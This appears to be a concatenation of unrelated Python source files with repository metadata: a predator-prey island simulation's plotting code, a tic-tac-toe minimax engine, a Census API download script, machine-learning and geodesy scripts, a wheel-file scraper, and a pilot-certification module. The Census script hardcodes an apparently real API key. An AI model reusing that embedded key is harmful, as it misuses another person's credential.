self._map.update_animal_params_all_cells(species, params)
def set_landscape_parameters(self, landscape, params):
"""
Set parameters for landscape type.
:param landscape: String, code letter for landscape
:param params: Dict with valid parameter specification for landscape
"""
self._map.update_param_all_cells(landscape, params)
def simulate(self, num_years, vis_years=1, img_years=None):
"""
Run simulation while visualizing the result.
:param num_years: number of years to simulate
:param vis_years: years between visualization updates
:param img_years: years between visualizations saved to files (default: vis_years)
Image files will be numbered consecutively.
"""
if img_years is None:
img_years = vis_years
self._final_year = self.year + num_years
self._setup_graphics()
while self._year < self._final_year:
if self._year % vis_years == 0:
self._update_graphics()
if self._year % img_years == 0:
self._save_graphics()
self._map.cycle()
self._year += 1
def _setup_graphics(self):
"""
Sets up plots and axes for the Simulation to be visualized
"""
if self._fig is None:
self._fig = plt.figure(figsize=(10, 8))
if self._island_map is None:
self._create_map()
if self._mean_ax is None:
self._mean_ax = self._fig.add_subplot(2, 2, 2)
self._mean_ax.set_title("Herbivore and Carnivore Population")
self._mean_ax.set_ylim(0, self.ymax_animals)
self._mean_ax.set_xlim(0, self._final_year + 1)
self._create_herb_line()
self._create_carn_line()
self.year_format = "Year: {:5d}"
if not self.year_counter_active:
self.txt = self._fig.text(
0.09,
0.97,
self.year_format.format(0),
ha="center",
va="center",
bbox=dict(boxstyle="round", ec=(0, 0, 0), fc="none",),
)
self.year_counter_active = True
if self.herb_heat is None:
self.herb_heat = self._fig.add_subplot(2, 2, 1)
self.herb_heat.set_title("Herbivore Heat Map")
self.herb_img_axis = None
if self.carn_heat is None:
self.carn_heat = self._fig.add_subplot(2, 2, 3)
self.carn_heat.set_title("Carnivore Heat Map")
self.carn_img_axis = None
self._fig.tight_layout()
def _update_graphics(self):
"""
Updates the plots with new data
"""
pop_df = self.animal_distribution
rows, cols = np.shape(self._map.map)
herb_count = pop_df.Herbivore
herb_array = np.array(herb_count).reshape(rows, cols)
carn_count = pop_df.Carnivore
carn_array = np.array(carn_count).reshape(rows, cols)
self._update_specie_lines()
self._update_herb_heatmap(herb_array)
self._update_carn_heatmap(carn_array)
self.txt.set_text(self.year_format.format(self.year))
plt.pause(1e-6)
def _save_graphics(self):
"""
Saves the plots as a specified file type.
"""
if self.img_base is None:
return
print(
"Saving to",
"{base}_{num:05d}.{type}".format(
base=self.img_base, num=self.img_count, type=self.img_fmt
),
)
plt.savefig(
"{base}_{num:05d}.{type}".format(
base=self.img_base, num=self.img_count, type=self.img_fmt
)
)
self.img_count += 1
def _create_map(self):
"""
Creates map plot out of RGB colors and map string.
"""
self._island_map = self._fig.add_subplot(2, 2, 4)
self._island_map.set_title("Island Map")
self._island_map.imshow(self.map_rgb)
labels = ["Ocean", "Mountain", "Jungle", "Savannah", "Desert"]
patches = [
mpatches.Patch(color=self.rgb_value[i], label=labels[n])
for n, i in enumerate(self.rgb_value.keys())
]
self._island_map.legend(handles=patches, prop={"size": 5}, loc=4)
self._island_map.set_xticks(range(len(self.map_rgb[0])))
self._island_map.set_xticklabels(
labels=(range(1, 1 + len(self.map_rgb[0]))),
fontdict={"fontsize": 6},
)
self._island_map.set_yticks(range(len(self.map_rgb)))
self._island_map.set_yticklabels(
labels=range(1, 1 + len(self.map_rgb)), fontdict={"fontsize": 6}
)
def _create_herb_line(self):
"""
Creates population graph for Herbivores
"""
if self._herb_line is None:
herb_plot = self._mean_ax.plot(
np.arange(0, self._final_year),
np.full(self._final_year, np.nan),
)
self._herb_line = herb_plot[0]
else:
xdata, ydata = self._herb_line.get_data()
xnew = np.arange(xdata[-1] + 1, self._final_year)
if len(xnew) > 0:
ynew = np.full(xnew.shape, np.nan)
self._herb_line.set_data(
np.hstack((xdata, xnew)), np.hstack((ydata, ynew))
)
def _create_carn_line(self):
"""
Creates population graph for Carnivores
"""
if self._carn_line is None:
carn_plot = self._mean_ax.plot(
np.arange(0, self._final_year),
np.full(self._final_year, np.nan),
)
self._carn_line = carn_plot[0]
else:
xdata, ydata = self._carn_line.get_data()
xnew = np.arange(xdata[-1] + 1, self._final_year)
if len(xnew) > 0:
ynew = np.full(xnew.shape, np.nan)
self._carn_line.set_data(
np.hstack((xdata, xnew)), np.hstack((ydata, ynew))
)
def _update_herb_heatmap(self, herb_heat):
"""
Updates the heatmap for Herbivores
"""
if self.herb_img_axis is not None:
self.herb_img_axis.set_data(herb_heat)
else:
self.herb_img_axis = self.herb_heat.imshow(
herb_heat,
interpolation="nearest",
vmin=0,
vmax=self.cmax_animals["Herbivore"],
)
cax = self._fig.add_axes([0.05, 0.5, 0.4, 0.02])
cbar = self._fig.colorbar(
self.herb_img_axis, cax=cax, orientation="horizontal"
)
cbar.set_ticks([])
cbar.ax.text(0.5, 0, "Low", va="bottom", ha="left", color="white")
cbar.ax.text(50, 0, "High", va="bottom", ha="right")
self.herb_heat.set_xticks(range(len(self.map_rgb[0])))
self.herb_heat.set_xticklabels(
labels=(range(1, 1 + len(self.map_rgb[0]))),
fontdict={"fontsize": 6},
)
self.herb_heat.set_yticks(range(len(self.map_rgb)))
self.herb_heat.set_yticklabels(
labels=range(1, 1 + len(self.map_rgb)), fontdict={"fontsize": 6}
)
def _update_carn_heatmap(self, carn_heat):
"""
Updates the heaptmap for Carnivores
"""
if self.carn_img_axis is not None:
self.carn_img_axis.set_data(carn_heat)
else:
self.carn_img_axis = self.carn_heat.imshow(
carn_heat,
interpolation="nearest",
vmin=0,
vmax=self.cmax_animals["Carnivore"],
)
self.carn_heat.set_xticks(range(len(self.map_rgb[0])))
self.carn_heat.set_xticklabels(
labels=(range(1, 1 + len(self.map_rgb[0]))),
fontdict={"fontsize": 6},
)
self.carn_heat.set_yticks(range(len(self.map_rgb)))
self.carn_heat.set_yticklabels(
labels=(range(1, 1 + len(self.map_rgb))), fontdict={"fontsize": 6}
)
def _update_specie_lines(self):
"""
Updates the population lines for Herbivore and Carnivore
"""
herb_amount = self.num_animals_per_species["Herbivore"]
ydata_herb = self._herb_line.get_ydata()
ydata_herb[self._year] = herb_amount
self._herb_line.set_ydata(ydata_herb)
carn_amount = self.num_animals_per_species["Carnivore"]
ydata_carn = self._carn_line.get_ydata()
ydata_carn[self._year] = carn_amount
self._carn_line.set_ydata(ydata_carn)
self._mean_ax.legend(["Herbivore", "Carnivore"], prop={"size": 6})
def add_population(self, population):
"""
Add a population to the island
:param population: List of dictionaries specifying population
"""
self._map.add_animals(population)
@property
def year(self):
"""Last year simulated."""
return self._year
@property
def num_animals(self):
"""Total number of animals on island."""
self._num_animals = sum(self._map.num_species_on_map())
print(self._num_animals)
return self._num_animals
@property
def num_animals_per_species(self):
"""Number of animals per species in island, as dictionary."""
tot_herbivore, tot_carnivore = self._map.num_species_on_map()
self._num_animals_per_species["Herbivore"] = tot_herbivore
self._num_animals_per_species["Carnivore"] = tot_carnivore
return self._num_animals_per_species
@property
def animal_distribution(self):
"""Pandas DataFrame with animal count per species for each cell on
island. """
list_of_dicts = []
y_lim, x_lim = np.shape(self._map.map)
for y in range(y_lim):
for x in range(x_lim):
curr_cell = self._map.map[(y, x)]
(
curr_herbivores,
curr_carnivores,
) = curr_cell.num_species_per_cell()
curr_dict = {
"Row": y,
"Col": x,
"Herbivore": curr_herbivores,
"Carnivore": curr_carnivores,
}
list_of_dicts.append(curr_dict)
df = pd.DataFrame(
list_of_dicts, columns=["Row", "Col", "Herbivore", "Carnivore"]
)
return df
def make_movie(self, movie_fmt=_DEFAULT_MOVIE_FORMAT):
"""Create MPEG4 movie from visualization images saved."""
if self.img_base is None:
raise RuntimeError("No filename defined.")
if movie_fmt == "mp4":
try:
# Parameters chosen according to
# http://trac.ffmpeg.org/wiki/Encode/H.264, section
# "Compatibility"
subprocess.check_call(
[
_FFMPEG_BINARY,
"-i",
"{}_%05d.png".format(self.img_base),
"-y",
"-profile:v",
"baseline",
"-level",
"3.0",
"-pix_fmt",
"yuv420p",
"{}.{}".format(self.img_base, movie_fmt),
]
)
except subprocess.CalledProcessError as err:
raise RuntimeError("ERROR: ffmpeg failed with: {}".format(err))
elif movie_fmt == "gif":
try:
subprocess.check_call(
[
_CONVERT_BINARY,
"-delay",
"1",
"-loop",
"0",
"{}_*.png".format(self.img_base),
"{}.{}".format(self.img_base, movie_fmt),
]
)
except subprocess.CalledProcessError as err:
raise RuntimeError(
"ERROR: convert failed with: {}".format(err)
)
else:
raise ValueError("Unknown movie format: " + movie_fmt)
| amirarfan/BioSim_G03_Amir_Sebastian | src/biosim/simulation.py | simulation.py | py | 15,901 | python | en | code | 0 | github-code | 36 |
38758362841 | #!/usr/bin/env python
"""
engine utilises a function policy to choose the best move using minimax
"""
from noughts_crosses import *
from node import *
class Engine:
def __init__(self, policy, searchDepth, discount):
# policy : fn board -> [-1.0, 1.0]'
# searchDepth : int
self.policy = policy
self.searchDepth = searchDepth
self.discount = discount
def create_search_tree(self, board, player):
'create search tree from board'
node = Node(board)
if player == players[0]:
self.maximise(node, self.searchDepth, True)
else:
self.minimise(node, self.searchDepth, True)
return node
def minimax(self, board, player):
'find self.bestMove using minimax and principal variation'
return self.create_search_tree(board, player).pv.board
def maximise(self, node, depth, rootNode):
'maximise policy score for players[0]'
if (depth == 0) or (node.reward is not None):
return self.policy(node.board)
moves = move_all(players[0], node.board)
score = -2.0
for m in moves:
daughter = Node(m)
newScore = self.minimise(daughter, depth-1, False)
if (newScore > score):
if node.pv is not None:
node.other.append(node.pv)
score = newScore
node.pv = daughter
else:
node.other.append(daughter)
return self.discount * score
def minimise(self, node, depth, rootNode):
'minimise policy score for players[1]'
if (depth == 0) or (node.reward is not None):
return self.policy(node.board)
moves = move_all(players[1], node.board)
score = 2.0
for m in moves:
daughter = Node(m)
newScore = self.maximise(daughter, depth-1, False)
if (newScore < score):
if node.pv is not None:
node.other.append(node.pv)
score = newScore
node.pv = daughter
else:
node.other.append(daughter)
return self.discount * score
if __name__ == "__main__":
e = Engine(optimal, 9, 0.7)
tree = e.create_search_tree(initialBoard, players[0])
assert(len(tree.other) == 8)
pretty_print(tree.pv.board)
| dyth/Juno | engine.py | engine.py | py | 2,412 | python | en | code | 0 | github-code | 36 |
40117095233 | """
pop_by_tract.py (Script 1/3)
Date updated: 5/11/2023
Imports DC population data by census tract from Census API.
"""
"""
Requires:
- Census API key, which can be acquired here: https://api.census.gov/data/key_signup.html
Output:
- "pop_by_tract_2020.csv"
"""
#%%
## Set working directory to script directory "2020_Analysis"
## Note: Be sure that the required input files are located in the "2020_Analysis"
## folder as well.
import os
os.chdir(os.path.dirname(__file__))
#%%
# Import modules
import requests
import pandas as pd
import numpy as np
#%%
## API call
# Variable dictionary
variables = {'B02001_001E':'pop_total', 'B02001_002E':'pop_white',
'B25003_001E':'housing_total', 'B25003_002E':'housing_owned',
'B25003_003E':'housing_rental'}
# Variable list
var_list = variables.keys()
# Variable string (comma-separated)
var_string = ",".join(var_list)
# URL
api = 'https://api.census.gov/data/2020/acs/acs5'
# Set geographic unit
for_clause = 'tract:*'
# Select NY
in_clause = 'state:11 county:001'
key_value = 'f382fd0108eba2b32808ba82bcccc82861d0b53a'
# API call
payload = {'get':var_string, 'for':for_clause, 'in':in_clause, 'key':key_value}
response = requests.get(api, payload)
if response.status_code == 200:
print('\nAPI Request: Success\n')
else:
print(f'\nRequest status code: {response.status_code}\n{response.text}\n')
assert False
#%%
## Convert JSON to Dataframe
# List of rows
row_list = response.json()
# Set column names
colnames = row_list[0]
# Set data rows
datarows = row_list[1:]
# Pandas dataframe
pop = pd.DataFrame(columns=colnames, data=datarows)
#%%
## Prepare data
# Replace missing data with NaN
pop = pop.replace(-666666666, np.nan)
# Rename columns
pop = pop.rename(columns=variables)
# GEOID column
pop['GEOID'] = pop['state'] + pop['county'] + pop['tract']
# Set index to GEOID
pop = pop.set_index('GEOID')
# Drop columns
keep_cols = variables.values()
pop = pop[keep_cols]
#%%
## Write population by census tract to CSV
pop.to_csv('pop_by_tract_2020.csv')
print("\nDownloaded 'pop_by_tract_2020.csv'")
| tbond99/dc-historic-districts-and-gentrification | 1__2020_Analysis/1_pop_by_tract.py | 1_pop_by_tract.py | py | 2,153 | python | en | code | 0 | github-code | 36 |
18395372288 | """
Produce the feature importance matrices for the trained RF models as in Figures 4-6 of Appleby+2023.
"""
import matplotlib
import matplotlib.pyplot as plt
import seaborn as sns
import numpy as np
import pandas as pd
import pickle
import sys
from sklearn.ensemble import RandomForestRegressor, ExtraTreesRegressor
from sklearn import preprocessing
from sklearn.metrics import r2_score, explained_variance_score, mean_squared_log_error, mean_squared_error
from scipy.stats import pearsonr
np.random.seed(1)
plt.rc('text', usetex=True)
plt.rc('font', family='serif', size=16)
if __name__ == '__main__':
model = sys.argv[1]
wind = sys.argv[2]
snap = sys.argv[3]
line = sys.argv[4]
features = ['N', 'b', 'EW', 'dv', 'r_perp', 'mass', 'ssfr', 'kappa_rot']
predictors = ['delta_rho', 'T', 'Z']
features_pretty = [r'${\rm log} N$', r'$b$', r'${\rm log\ EW}$',
r'${\rm d}v$', r'$f_{r200}$', r'${\rm log} M_\star$',
r'${\rm sSFR}$', r'$\kappa_{\rm rot}$']
predictors_pretty = [r'${\rm log}\ \delta$', r'${\rm log}\ T$', r'${\rm log}\ Z$']
lines = ["H1215", "MgII2796", "CII1334", "SiIII1206", "CIV1548", "OVI1031"]
lines_short = ['HI', 'MgII', 'CII', 'SiIII', 'CIV', 'OVI']
zsolar = [0.0134, 7.14e-4, 2.38e-3, 6.71e-4, 2.38e-3, 5.79e-3]
model_dir = './models/'
cmap = sns.color_palette("flare_r", as_cmap=True)
fig, ax = plt.subplots(1, 3, figsize=(18, 9))
fig.subplots_adjust(right=0.8)
cbar_ax = fig.add_axes([0.82, 0.295, 0.02, 0.4])
importance = np.zeros((3, len(features), len(features)))
for p, pred in enumerate(predictors):
# Load in the random forest gridsearch and the absorber data
gridsearch, _, _, _, _ = \
pickle.load(open(f'{model_dir}{model}_{wind}_{snap}_{lines_short[lines.index(line)]}_lines_RF_{pred}.model', 'rb'))
df_full = pd.read_csv(f'data/{model}_{wind}_{snap}_{line}_lines.csv')
train = df_full['train_mask']
err = pd.DataFrame(columns=['Feature removed', 'Pearson', 'r2_score', 'explained_variance_score', 'mean_squared_error'])
for i in range(len(features)):
# Iteratively choose all features but one
features_use = np.delete(features, i)
idx = np.delete(np.arange(len(features)), i)
# Scale the features and predictors to mean 0 and sigma 1
feature_scaler = preprocessing.StandardScaler().fit(df_full[train][features_use])
predictor_scaler = preprocessing.StandardScaler().fit(np.array(df_full[train][pred]).reshape(-1, 1) )
# Train a random forest model using the best parameters from the full grid search and all but one of the features
random_forest = RandomForestRegressor(n_estimators=gridsearch.best_params_['n_estimators'],
min_samples_split=gridsearch.best_params_['min_samples_split'],
min_samples_leaf=gridsearch.best_params_['min_samples_leaf'],)
random_forest.fit(feature_scaler.transform(df_full[train][features_use]), predictor_scaler.transform(np.array(df_full[train][pred]).reshape(-1, 1) ))
# Get the feature importances
importance[p][i][idx] = random_forest.feature_importances_
# Evaluate the performance of the model
conditions_pred = predictor_scaler.inverse_transform(np.array( random_forest.predict(feature_scaler.transform(df_full[~train][features_use]))).reshape(-1, 1) )
conditions_true = pd.DataFrame(df_full[~train],columns=[pred]).values
conditions_pred = conditions_pred.flatten()
conditions_true = conditions_true.flatten()
if pred == 'Z':
conditions_pred -= np.log10(zsolar[lines.index(line)])
conditions_true -= np.log10(zsolar[lines.index(line)])
scores = {}
scores['Feature removed'] = features[i]
scores['Pearson'] = round(pearsonr(conditions_true, conditions_pred)[0],3)
for _scorer in [r2_score, explained_variance_score, mean_squared_error]:
scores[_scorer.__name__] = float(_scorer(conditions_pred,
conditions_true, multioutput='raw_values'))
err = err.append(scores, ignore_index=True)
print(pred, err)
# Plot importance matrix
importance_use = np.transpose(importance[p])
mask = importance_use == 0
if p == len(predictors) - 1:
g = sns.heatmap(importance_use, mask=mask, cmap=cmap, vmax=1, vmin=0, annot=False, ax=ax[p], square=True, linewidths=.5,
cbar_ax=cbar_ax, cbar_kws={'label': 'Importance'})
else:
g = sns.heatmap(importance_use, mask=mask, cmap=cmap, vmax=1, vmin=0, annot=False, ax=ax[p], square=True, linewidths=.5,
cbar=False)
g.figure.axes[p].set_xticklabels(features_pretty, rotation='vertical', fontsize=15)
g.figure.axes[p].set_xlabel('Removed feature')
if p == 0:
g.figure.axes[p].set_ylabel('Remaining features')
g.figure.axes[p].set_yticklabels(features_pretty, rotation='horizontal', fontsize=15)
else:
g.figure.axes[p].set_yticklabels(['']*len(features), rotation='horizontal', fontsize=15)
g.figure.axes[p].set_title(predictors_pretty[p])
g.figure.axes[p].tick_params(left=False, bottom=False) ## other options are right and top
fig.subplots_adjust(wspace=0.1)
plt.savefig(f'plots/{model}_{wind}_{snap}_{lines_short[lines.index(line)]}_lines_RF_importance.png')
plt.close()
| sarahappleby/cgm_ml | plot_feature_importance.py | plot_feature_importance.py | py | 5,793 | python | en | code | 0 | github-code | 36 |
26259789038 | # Problem : Inverse Geodesic using GeographicLib
from geographiclib.geodesic import Geodesic
geod = Geodesic.WGS84 # กำหนดให้เป็นแบบจำลอง WGS84
def Geodesic_Inverse( lat1, lng1, lat2, lng2 ): # สร้างฟังก์ชันเพื่อหา Geodesic ด้วยวิธิ Inverse
result = geod.Inverse(lat1, lng1, lat2, lng2)
# กำหนด result เพื่อรองรับผลลัพธ์จากการเรียกใช้ Geodesic
fwd_Az1, fwd_Az2, s12 = result['azi1'], result['azi2'], result['s12']
# กำหนด forward แอซิมัธของจุดต้นทางและเก็บค่าแอซิมัธ
return fwd_Az1, fwd_Az2, s12
fwd_Az1, fwd_Az2, s12 = Geodesic_Inverse( 52.30861, 4.76389, 26.27083, 50.6336 )
# เก็บค่าที่ออกมาจากการใช้ฟังก์ชันไว้ในตัวแปรทั้งสามตัว
print(' fwd_Az1 | fwd_Az2 | Distance')
print( ' {:.5f} {:.5f} {:.3f} m. '.format(fwd_Az1, fwd_Az2, s12))
| isara-c/Geodesy-SurveyEng | GeodesicAirliner.py | GeodesicAirliner.py | py | 1,163 | python | th | code | 0 | github-code | 36 |
32527451220 | import requests
from bs4 import BeautifulSoup
from multiprocessing import Pool
def get_web_source():
with open('pylib_data.html','r') as r:
data = r.read()
return data
#print(data)
def get_url_list(web_source):
#url = 'https://www.lfd.uci.edu/~gohlke/pythonlibs/'
base_url = 'https://download.lfd.uci.edu/pythonlibs/h2ufg7oq/'
#try:
# web_source = requests.get(url).text
#except:
# print('请求失败!')
soup = BeautifulSoup(web_source,'lxml')
names = soup.select('.pylibs li ul li a')
url_list = []
str1 = names[0].text
#str2 = str1.encode('utf-8').decode('windows-1252')
#str2.encode('windows-1252').decode('utf-8')
print(str1)
print(str1)
for name in names:
#name1 = str(name.text)
#name1.replace(' ','_')
#print(name1)
url = base_url+name.text
#print(url)
if '.whl' in url:
print(url)
url_list.append(url)
with open('E:\\Desktop\\url.txt','a',encoding='utf-8') as f:
f.write(url+'\n')
return url_list
#web_source = get_web_source()
#url_list = get_url_list(web_source)
#print(url_list)
def download_whl(url):
try:
source = requests.get(url)
except:
print('请求资源错误!')
file_name = url.split('/')[-1]
print('正在下载:'+file_name)
with open('E:\\Desktop\\python_whl\\'+file_name,'wb') as f:
f.write(source.content)
#download_whl('https://download.lfd.uci.edu/pythonlibs/h2ufg7oq/ad3_2.2.1_cp27_cp27m_win32.whl')
def main():
pool = Pool(20)
web_source = get_web_source()
url_list = get_url_list(web_source)
#print(url_list)
pool.map(download_whl,url_list)
pool.close()
if __name__ == '__main__':
main()
| MrDannyWu/DannyPythonStudy | py_script/get_python_libs.py | get_python_libs.py | py | 1,785 | python | en | code | 0 | github-code | 36 |
7706920914 | from interventions_labeling_lib.hearst_pattern_finder import HearstPatterns
from text_processing import text_normalizer
import pickle
from time import time
from text_processing import concepts_merger
import os
class HyponymsSearch:
def __init__(self):
self.symbols_count = 5
self.dict_hyponyms = {}
self.global_hyponyms = {}
self.concepts_merger = concepts_merger.ConceptsMerger(self.symbols_count)
def add_hyponyms(self, hyponyms, article_number):
if article_number not in self.global_hyponyms:
self.global_hyponyms[article_number] = []
self.global_hyponyms[article_number].extend(hyponyms)
for detected_hyponym in hyponyms:
for word in detected_hyponym[:2]:
if word.strip() != "":
self.concepts_merger.add_item_to_dict(word,article_number)
def add_hyponyms_to_dict(self):
self.dict_hyponyms = {}
for article_number in self.global_hyponyms:
for detected_hyponym in self.global_hyponyms[article_number]:
if detected_hyponym[1] in self.concepts_merger.new_mapping and detected_hyponym[0] in self.concepts_merger.new_mapping:
first_word = self.concepts_merger.new_mapping[detected_hyponym[1]]
second_word = self.concepts_merger.new_mapping[detected_hyponym[0]]
if first_word not in self.dict_hyponyms:
self.dict_hyponyms[first_word] = {}
if second_word not in self.dict_hyponyms[first_word]:
self.dict_hyponyms[first_word][second_word] = []
self.dict_hyponyms[first_word][second_word].append((detected_hyponym[2].replace("NP_","").replace("_"," "), article_number, detected_hyponym[3]))
self.concepts_merger = concepts_merger.ConceptsMerger(self.symbols_count)
def create_hyponym_dict(self, search_engine_inverted_index, threshold = 0.92):
self.concepts_merger.merge_concepts(search_engine_inverted_index, threshold)
self.add_hyponyms_to_dict()
def find_hyponyms_and_hypernyms(self, articles_df, search_engine_inverted_index, filename_with_data="", columns_to_use=["title", "abstract"]):
if filename_with_data != "" and os.path.exists(filename_with_data):
hyp_s = pickle.load(open(filename_with_data,"rb"))
for article in hyp_s.global_hyponyms:
self.add_hyponyms(hyp_s.global_hyponyms[article], article)
h = HearstPatterns(True)
for i in range(len(articles_df)):
art_id = articles_df["id"].values[i] if "id" in articles_df.columns else i
if art_id in self.global_hyponyms:
continue
if i % 5000 == 0 or i == len(articles_df) - 1:
print("Processed %d articles" % i)
text = ""
for column in columns_to_use:
text = text + " . " + articles_df[column].values[i]
self.add_hyponyms(h.find_hyponyms(text), art_id)
self.create_hyponym_dict(search_engine_inverted_index) | MariyaIvanina/articles_processing | src/interventions_labeling_lib/hyponym_search.py | hyponym_search.py | py | 3,127 | python | en | code | 3 | github-code | 36 |
31266470749 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import django.utils.timezone
from django.conf import settings
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Comment',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('text', models.TextField(blank=True)),
('created_at', models.DateTimeField(default=django.utils.timezone.now, editable=False)),
],
),
migrations.CreateModel(
name='Like',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
],
),
migrations.CreateModel(
name='Product',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('name', models.CharField(max_length=200)),
('slug', models.CharField(max_length=220, blank=True)),
('description', models.TextField(blank=True)),
('price', models.DecimalField(max_digits=16, decimal_places=2)),
('created_at', models.DateTimeField(default=django.utils.timezone.now, editable=False)),
('modified_at', models.DateTimeField(default=django.utils.timezone.now)),
],
),
migrations.AddField(
model_name='like',
name='product',
field=models.ForeignKey(default=None, to='product.Product'),
),
migrations.AddField(
model_name='like',
name='user',
field=models.ForeignKey(to=settings.AUTH_USER_MODEL),
),
migrations.AddField(
model_name='comment',
name='product',
field=models.ForeignKey(to='product.Product'),
),
migrations.AddField(
model_name='comment',
name='user',
field=models.ForeignKey(default=None, blank=True, to=settings.AUTH_USER_MODEL),
),
migrations.AlterUniqueTogether(
name='like',
unique_together=set([('product', 'user')]),
),
]
| unkvuzutop/product | product/migrations/0001_initial.py | 0001_initial.py | py | 2,443 | python | en | code | 0 | github-code | 36 |
14566383158 | from django.core.management.base import BaseCommand
from depot.models import SiteBookPublish
class Command(BaseCommand):
def handle(self, **options):
for p in SiteBookPublish.objects.filter(status=0).order_by('created_at'):
print(p.id, p.site_book, p.created_at)
p.publish()
| fnp/redakcja | src/depot/management/commands/depot.py | depot.py | py | 314 | python | en | code | 4 | github-code | 36 |
26319259400 | """
Module determining pilot certifications, ratings, and endorsements.
The restrictions that we place on a pilot depend on their qualifications. There are three
ways to think about a pilot.
(1) Certifications. These are what licenses a pilot has. We also use these to classify
where the student is in the licensing process. Is the student post solo (can fly without
instructor), but before license? Is the student 50 hours past their license (a threshold
that helps with insurance)?
(2) Ratings. These are extra add-ons that a pilot can add to a license. For this project,
the only rating is Instrument Rating, which allows a pilot to fly through adverse weather
using only instruments.
(3) Endorsements. These are permission to fly certain types of planes solo. Advanced
allows a pilot to fly a plane with retractable landing gear. Multiengine allows a pilot
to fly a plane with more than one engine.
The file pilots.csv is a list of all pilots in the school, together with the dates that
they earned these certifications, ratings, and endorsements. Specifically, this CSV file
has the following header:
ID LASTNAME FIRSTNAME JOINED SOLO LICENSE 50 HOURS INSTRUMENT ADVANCED MULTIENGINE
The first three columns are strings, while all other columns are dates.
The functions in this class take a row from the pilot table and determine if a pilot has
a certain qualification at the time of takeoff. As this program is auditing the school
over a course of a year, a student may not be instrument rated for one flight but might
be for another.
The preconditions for many of these functions are quite messy. While this makes writing
the functions simpler (because the preconditions ensure we have less to worry about),
enforcing these preconditions can be quite hard. That is why it is not necessary to
enforce any of the preconditions in this module.
Author: Christopher Jordan
Date: September 18, 2021
"""
import utils
# CERTIFICATION CLASSIFICATIONS
# The certification of this pilot is unknown
PILOT_INVALID = -1
# A pilot that has joined the school, but has not soloed
PILOT_NOVICE = 0
# A pilot that has soloed but does not have a license
PILOT_STUDENT = 1
# A pilot that has a license, but has under 50 hours post license
PILOT_CERTIFIED = 2
# A pilot that 50 hours post license
PILOT_50_HOURS = 3
def get_certification(takeoff,student):
"""
Returns the certification classification for this student at the time of takeoff.
The certification is represented by an int, and must be the value PILOT_NOVICE,
PILOT_STUDENT, PILOT_CERTIFIED, PILOT_50_HOURS, or PILOT_INVALID. It is PILOT_50_HOURS
if the student has certified '50 Hours' before this flight takeoff. It is
PILOT_CERTIFIED if the student has a private license before this takeoff and
PILOT_STUDENT is the student has soloed before this takeoff. A pilot that has only
just joined the school is PILOT_NOVICE. If the flight takes place before the student
has even joined the school, the result is PILOT_INVALID.
Recall that a student is a 10-element list of strings. The first three elements are
the student's identifier, last name, and first name. The remaining elements are all
timestamps indicating the following in order: time joining the school, time of first
solo, time of private license, time of 50 hours certification, time of instrument
rating, time of advanced endorsement, and time of multiengine endorsement.
Parameter takeoff: The takeoff time of this flight
Precondition: takeoff is a datetime object
Parameter student: The student pilot
Precondition: student is 10-element list of strings representing a pilot
"""
tz_i = takeoff.tzinfo
parse_student = student[3:]
new_student = []
for x in range(len(parse_student)):
if parse_student[x] != '':
new_student.append(utils.str_to_time(parse_student[x]))
elif parse_student[x] == '':
new_student.append(parse_student[x])
tz_student = []
for x in range(len(new_student)):
if new_student[x] != '':
var = new_student[x].replace(tzinfo=tz_i)
tz_student.append(var)
elif new_student[x] == '':
tz_student.append(new_student[x])
if tz_student[3] != '':
if takeoff > tz_student[3]:
return PILOT_50_HOURS
elif takeoff > tz_student[2]:
return PILOT_CERTIFIED
elif takeoff > tz_student[1]:
return PILOT_STUDENT
elif takeoff > tz_student[0]:
return PILOT_NOVICE
elif takeoff < tz_student[0]:
return PILOT_INVALID
elif tz_student[2] != '':
if takeoff > tz_student[2]:
return PILOT_CERTIFIED
elif takeoff > tz_student[1]:
return PILOT_STUDENT
elif takeoff > tz_student[0]:
return PILOT_NOVICE
elif takeoff < tz_student[0]:
return PILOT_INVALID
elif tz_student[1] != '':
if takeoff > tz_student[1]:
return PILOT_STUDENT
elif takeoff > tz_student[0]:
return PILOT_NOVICE
elif takeoff < tz_student[0]:
return PILOT_INVALID
elif tz_student[0] != '':
if takeoff > tz_student[0]:
return PILOT_NOVICE
elif takeoff < tz_student[0]:
return PILOT_INVALID
else:
return PILOT_INVALID
"""
if student[6] != '':
if takeoff > utils.str_to_time(student[6]):
return PILOT_50_HOURS
elif takeoff > utils.str_to_time(student[5]):
return PILOT_CERTIFIED
elif takeoff > utils.str_to_time(student[4]):
return PILOT_STUDENT
elif takeoff > utils.str_to_time(student[3]):
return PILOT_NOVICE
elif takeoff < utils.str_to_time(student[3]):
return PILOT_INVALID
elif student[5] != '':
if takeoff > utils.str_to_time(student[5]):
return PILOT_CERTIFIED
elif takeoff > utils.str_to_time(student[4]):
return PILOT_STUDENT
elif takeoff > utils.str_to_time(student[3]):
return PILOT_NOVICE
elif takeoff < utils.str_to_time(student[3]):
return PILOT_INVALID
elif student[4] != '':
if takeoff > utils.str_to_time(student[4]):
return PILOT_STUDENT
elif takeoff > utils.str_to_time(student[3]):
return PILOT_NOVICE
elif takeoff < utils.str_to_time(student[3]):
return PILOT_INVALID
elif student[3] != '':
if takeoff > utils.str_to_time(student[3]):
return PILOT_NOVICE
elif takeoff < utils.str_to_time(student[3]):
return PILOT_INVALID
else:
return PILOT_INVALID
"""
def has_instrument_rating(takeoff,student):
"""
Returns True if the student has an instrument rating at the time of takeoff, False otherwise
Recall that a student is a 10-element list of strings. The first three elements are
the student's identifier, last name, and first name. The remaining elements are all
timestamps indicating the following in order: time joining the school, time of first
solo, time of private license, time of 50 hours certification, time of instrument
rating, time of advanced endorsement, and time of multiengine endorsement.
NOTE: Just because a pilot has an instrument rating does not mean that every flight
with that pilot is an IFR flight. It just means the pilot could choose to use VFR
or IFR rules.
Parameter takeoff: The takeoff time of this flight
Precondition: takeoff is a datetime object
Parameter student: The student pilot
Precondition: student is 10-element list of strings representing a pilot
"""
if student[7] != '' and takeoff > utils.str_to_time(student[7]):
return True
else:
return False
def has_advanced_endorsement(takeoff,student):
"""
Returns True if the student has an endorsement to fly an advanced plane at the time of takeoff.
The function returns False otherwise.
Recall that a student is a 10-element list of strings. The first three elements are
